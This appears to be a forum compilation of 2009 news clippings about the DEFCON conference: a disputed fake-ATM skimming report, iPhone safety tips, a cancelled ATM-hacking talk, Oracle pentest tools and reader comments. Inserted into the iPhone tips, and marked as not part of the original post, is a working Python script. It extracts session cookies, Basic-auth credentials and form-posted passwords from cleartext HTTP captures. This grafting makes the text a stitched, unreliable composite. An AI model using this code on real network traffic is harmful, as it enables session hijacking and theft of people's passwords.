By Steve Green
Wednesday, Aug. 5, 2009 | 6:58 p.m.
Gaming executives Wednesday disputed reports that hackers in town for the annual DEFCON conference over the weekend perpetrated frauds involving casino ATM machines.
Some broadcast and Internet reports said scammers had wheeled a fake ATM machine into the Riviera hotel-casino on the Las Vegas Strip with the goal of having people try to use it so the scammers could capture their card and PIN numbers.
That didn't happen, the Riviera said Wednesday.
In fact, the ATM in question in the hotel's convention lobby is owned by the hotel-casino and was deactivated as a security precaution while DEFCON was in town.
One Internet headline proclaimed: "Hacker exposes hacked Las Vegas ATM at DEFCON"
But it appears the Riviera and its security staff may have outsmarted the hackers by simply turning off the machine.
"Although it has been reported as an ATM machine purposely placed in the Riviera’s convention lobby by some unknown hacker to capture data on others that attempt to use it during DEFCON, the truth is, the Riviera-owned-and-operated ATM was turned off and the cash was removed as a precaution in preparation for the conference," Robert Vannucci, president of the Riviera, said in a statement.
Suggestions that hackers tampered with an ATM at the Rio hotel-casino also turned out to be untrue, said officials with Global Cash Access Inc. of Las Vegas, which operates ATMs at casinos around the country.
After hearing reports about problems with an ATM at the Rio, GCA's technology chief was sent to investigate Tuesday and found nothing wrong with the machines there, said Scott Dowty, GCA executive vice president of business development.
He said there have been recent problems at casinos in Las Vegas and elsewhere known as "cash dispense errors" when customers try to obtain cash and their accounts are charged, but the machines don't dispense the cash. These problems are associated with a recent change in technology platforms involving certain machines -- but not those at the Rio, Dowty said.
He said customers who don't receive money because of machine errors should call GCA customer service at 800 644-0439.
Four South Korean journalists were booted from the Defcon hacking conference this week after conference organizers decided their story didn't quite add up.
The Best (and Worst) Hacks of Defcon Computer Security Conference 2009
Computer security is a famously murky world that tends to generate alarmist headlines--like the ones about Apple's vulnerabilities from last week. Defcon 2009 has just finished, and lived up to this reputation in many surprising ways. We've rounded up some of the best, worst, and most interesting bits of news.
By Kim Zetter | August 2, 2009 | 4:32 pm | Categories: ATM Hacking, DefCon
LAS VEGAS — There’s no honor among thieves, nor apparently among hackers.
A malicious ATM kiosk was positioned in the conference center of the Riviera Hotel Casino capturing data from an unknown number of hackers attending the DefCon hacker conference before someone noticed something suspicious about the kiosk.
An organizer for the conference said security authorities seized the device. It’s not known how long the ATM was in the hotel or whether it was placed there by a DefCon attendee to catch his fellow hackers or simply by an outside criminal group trying to target conference attendees.
Witnesses say the kiosk was well-placed to avoid surveillance cameras.
“In any casino anything that is considered that high value has a camera,” said Brian Markus, CEO of Aries Security who saw the machine, “and they placed it where there were no [hotel] cameras visibly watching that exact spot where the ATM was.”
Markus said it was clear to him the ATM was fake when he looked at the smoked glass on the front of the machine and noticed something funny about it. When he beamed a flashlight through the glass, instead of seeing a camera behind it, he saw the PC that was set up to siphon card data.
The ATM had been placed right outside the hotel’s security office.
There's a photo of the offending ATM on the linked page.
This week, MuscleNerd and a few other unnamed dev team members will be at DEFCON 17 in Las Vegas. We'll of course be carrying our iPhones on us like last year. Bringing an iPhone to a conference packed with hackers has both benefits and risks. Here are 10 tips for iPhone users at a hacker conference (or any technical conference). Most of these tips apply to jailbroken devices, but some apply to stock devices too.
1. Disable all your login cookies in Safari. If you use the hotel or conference wifi, it is 100% guaranteed that your traffic will be sniffed. If you allow a web site (like twitter.com) to store your login info in a cookie, and if you connect to that site through a normal http connection, your login info will be exposed. At the very least, you'll end up on the Wall of Sheep. But you'll be giving up your password to anyone else sniffing too.
...
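The sniffing scenario in tip 1 above, as an added example that is not part of the dev team's post: a small Python script in the style of the Wall of Sheep, which parses cleartext HTTP requests captured off a shared network and pulls out the session cookies, HTTP Basic credentials and form-posted passwords that a plain http connection hands to every other client on the wifi. The capture bytes, host names and credential values are constructed for the example; a real run would feed it TCP payloads from a pcap. The second function shows the server-side check behind the tip: a cookie set with the Secure attribute is never attached to a plain http request in the first place, so disabling cookies on the client is the workaround for sites that omit it.

```python
"""Wall-of-Sheep-style extraction of credentials from cleartext HTTP.

Added example, not code from the dev team post. The byte string below is a
constructed stand-in for TCP payloads captured on an open conference
network; the hosts and credential values are invented for the example.
"""
import base64
from urllib.parse import parse_qs

# Constructed sample capture: three cleartext HTTP requests as a sniffer on
# the same wireless network would see them (hypothetical hosts and values).
SAMPLE_CAPTURE = (
    b"GET /home HTTP/1.1\r\n"
    b"Host: twitter.com\r\n"
    b"User-Agent: Mozilla/5.0 (iPhone)\r\n"
    b"Cookie: _twitter_sess=BAh7CToNY3VycmVudF91c2VyaQNj; lang=en\r\n"
    b"\r\n"
    b"GET /admin HTTP/1.1\r\n"
    b"Host: intranet.example\r\n"
    b"Authorization: Basic YWxpY2U6aHVudGVyMg==\r\n"
    b"\r\n"
    b"POST /login HTTP/1.1\r\n"
    b"Host: forum.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 36\r\n"
    b"\r\n"
    b"username=bob&password=s3cret%21&go=1"
)

# Cookie names that usually carry a login session rather than a preference.
SESSION_COOKIE_HINTS = ("sess", "sid", "auth", "token", "login")
PASSWORD_FIELDS = ("password", "passwd", "pass", "pwd")
USERNAME_FIELDS = ("username", "user", "email", "login")


def split_requests(stream: bytes):
    """Yield (request_line, headers, body) for each HTTP request in a stream.

    Headers are lower-cased; the body length comes from Content-Length
    (missing means no body), which is enough for the request side.
    """
    pos = 0
    while pos < len(stream):
        end = stream.find(b"\r\n\r\n", pos)
        if end < 0:
            break
        head = stream[pos:end].decode("latin-1").split("\r\n")
        request_line, header_lines = head[0], head[1:]
        headers = {}
        for line in header_lines:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = end + 4
        length = int(headers.get("content-length") or 0)
        yield request_line, headers, stream[body_start:body_start + length]
        pos = body_start + length


def extract_credentials(stream: bytes):
    """Return the reusable secrets visible in a cleartext HTTP capture."""
    findings = []
    for request_line, headers, body in split_requests(stream):
        host = headers.get("host", "?")
        method = request_line.partition(" ")[0]
        # A session cookie on a plain-http request is replayable by anyone
        # who saw it: no password needed to hijack the account.
        for part in headers.get("cookie", "").split(";"):
            name, _, value = part.strip().partition("=")
            if name and any(h in name.lower() for h in SESSION_COOKIE_HINTS):
                findings.append({"host": host, "kind": "session-cookie",
                                 "name": name, "value": value})
        # HTTP Basic is only base64, not encryption.
        auth = headers.get("authorization", "")
        if auth.lower().startswith("basic "):
            user, _, pw = base64.b64decode(auth[6:]).decode("latin-1").partition(":")
            findings.append({"host": host, "kind": "basic-auth",
                             "user": user, "password": pw})
        # A login form posted over http sends the password itself.
        ctype = headers.get("content-type", "")
        if method == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
            form = parse_qs(body.decode("latin-1"))
            pw_field = next((f for f in PASSWORD_FIELDS if f in form), None)
            if pw_field:
                user = next((form[u][0] for u in USERNAME_FIELDS if u in form), "?")
                findings.append({"host": host, "kind": "form-password",
                                 "user": user, "password": form[pw_field][0]})
    return findings


def cookie_sent_over_http(set_cookie: str) -> bool:
    """True if a cookie set by this Set-Cookie header would be attached to
    plain http requests, i.e. the site omitted the Secure attribute."""
    attrs = [a.strip().lower() for a in set_cookie.split(";")[1:]]
    return "secure" not in attrs


if __name__ == "__main__":
    for finding in extract_credentials(SAMPLE_CAPTURE):
        print(finding)
    print("leaks over http:", cookie_sent_over_http("_twitter_sess=x; Path=/; HttpOnly"))
```

Run it as a script to see the three findings printed; the same parsing applied to real captures is what puts names on the Wall of Sheep. Note that the cookie check is the site operator's fix (Secure plus an https-only site), which is why the tip tells attendees to clear login cookies rather than rely on the site.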
"One good thing about the [economic] downturn is that the Riviera Hotel has been easier to deal with," said Moss, who was recently named to the Homeland Security Advisory Council. "They're letting us have access to the pool, so we'll have pool parties, and they've allowed us to do more social things that we wanted to do."
...
Juniper Networks pulled a talk one of its researchers was set to give about a flaw in ATM software after the ATM vendor complained. In his presentation entitled "Jackpotting Automated Teller Machines," Barnaby Jack was planning to provide a live demonstration of an attack on an automated teller machine.
"I'm disappointed Barnaby Jack's talk was canceled," said Moss. Another speaker this year was "forced or encouraged" not to release a tool, Moss said, but he couldn't remember which speaker or talk it was.
...
During their presentation at the Black Hat and Defcon hacker conferences next week in Las Vegas, security experts will release a tool that can be used to break into Oracle databases.
Chris Gates and Mario Ceballos will present Oracle Pentesting Methodology and give out "all the tools to break the 'unbreakable' Oracle as Metasploit auxiliary modules," according to a summary of their presentation on the Defcon Web site.
...
Security BSides will coincide with the popular Black Hat and Defcon ... It is a free, two-day event made up of 65 attendees (so far), 15 presenters, and six organizers.
...
According to the organizers:
"A number of quality speakers were rejected, not due to lack of quality but lack of space and time." ... "Our goal is to provide people with options by removing those barriers and providing more options of speakers, topics, and events."
I hope to bring you original interviews and information on the latest research, illuminating the stories behind the data. In many ways, this will be a reporter's notebook ....
For the next few weeks, I plan to peer into the research that will be presented next week in Las Vegas at the Black Hat Conference and the following DEFCON hacking conference.
The decision over whether to do that or wait until next month's Patch Tuesday may hinge upon whether attackers begin exploiting these other vulnerable areas by using Microsoft's patch (and Flake's research) as a guide to locating the flaws. What's more, this bug is almost certain to be discussed at Black Hat and Defcon, the world's largest annual security conferences, being held next week in Las Vegas.
Lt. Col. Robin Williams, aka “Montana,” of the 57th Information Aggressor Squadron does not rebuff comparisons of the 1980s movie “WarGames” and his team at Nellis.
...
The Information Aggressors supplement their knowledge of such threats by staying in contact with the usual alphabet soup government agencies — FBI, CIA and NSA — and also anti-virus and firewall companies such as Norton and Symantec. There are also field trips to Black Hat Briefings and the DEFCON hacker conventions.
The last URL-linked article was the most entertaining to read.
Most of the security action happening later this month will be in Vegas' Caesars Palace and the Riviera Hotel, where Black Hat USA and Defcon will convene.
...
SecurityBSides was created as an alternative venue for research talks that were either rejected by Black Hat or just not submitted. It's a free, participant-driven, informal get-together where security researchers will share their thoughts -- and bring their own beer.
...
It's not a protest or direct competitor to Black Hat, he [Jack Daniel] says
“This is not something you can change overnight, but it had to start somewhere,” said Jeff Moss, founder of the Black Hat and DEFCON conferences. He said that securing the nation's infrastructure will be a daunting task because the government is using a lot of old technology that works, but isn't secure.
I have had this happen to me. My employer signed off on a presentation I was going to do at the first ShmooCon and then about a month before the Con they changed their mind, whipped out my NDA and told me I couldn't do it.
And I have to disagree with pulling a Michael Lynn. I think quitting your job is about a retarded reaction, especially if you do have an NDA in place that would allow your (former) employer to sue your ass off.
I've quit a job to go to con, but I was trying to get out of there anyways and revoking my vacation was the last straw.
Depending on how deep the NDA hooks go, particularly in this economy, you better have a damn good reason to burn bridges like that.
Fortunately my employer (me) is unlikely to sue (myself). Now if I could just figure out US copyright law, my talk would be set.
still... i wish there was some sort of requirement when you submit a talk that you either (a) have full permission from your employer to present or (b) agree that you'll quit your job and pull a Michael Lynn and give the talk anyway.
fucking lame. that was one i was really looking forward to, even if it was going to possibly be more hype and little delivery. (with a title like that, content is suspect)
Full Disclosure - i am not personally acquainted with the fellow in question and for all i know he could be a decent guy. still... just seems like a douchey situation all around.
Anyone have the inside scoop on what talk is replacing this?